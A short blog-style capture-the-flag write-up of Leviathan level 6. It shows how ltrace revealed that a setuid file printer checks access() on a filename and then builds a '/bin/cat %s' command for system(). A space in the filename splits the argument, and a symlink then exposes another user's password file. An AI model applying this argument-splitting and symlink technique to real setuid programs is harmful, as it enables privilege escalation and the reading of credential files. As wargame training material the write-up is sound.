leviathan level 6 wargame at intruded.net (6/8) wargames

This program seems to print file (printfile) located in /wargame... if run them:

level6@leviathan:/wargame$ ./printfile
*** File Printer ***
Usage: ./printfile filename

Trying to read the password of next level...

level6@leviathan:/wargame$ ln -s /home/level7/.passwd /tmp/passwd
level6@leviathan:/wargame$ ./printfile /tmp/pass
You cant have that file...

Don't work... let's see with ltrace...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/passwd
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/passwd", 0)                         = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++

Check the permissions before show the file... ok, feed the program with correct permisions file...

level6@leviathan:/wargame$ echo "Hi" > /tmp/world
level6@leviathan:/wargame$ ./printfile /tmp/world

Seems work fine, ltrace this...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/world
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/world", 0)                          = 0
snprintf("/bin/cat /tmp/world", 511, "/bin/cat %s", "/tmp/world") = 19
system("/bin/cat /tmp/world"Hi
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

Works fine, use system call for show the contents.. and construct the string with snprintf... 

Solution: construct string with snprintf permits to inject more commands :)

level6@leviathan:/wargame$ ltrace ./printfile "/tmp/hello world"
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/hello world", 0)                    = 0
snprintf("/bin/cat /tmp/hello world", 511, "/bin/cat %s", "/tmp/hello world") = 25
system("/bin/cat /tmp/hello world"/bin/cat: /tmp/hello: No such file or directory
/bin/cat: world: No such file or directory
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++

Whatch this... access perform over "hello world" file, but cat, try to watch "/tmp/hello" and "world" :) easy, create "hello world" with some garbage inside, and link hello to passwd file :)

Posted at BinaryCell


Popular Posts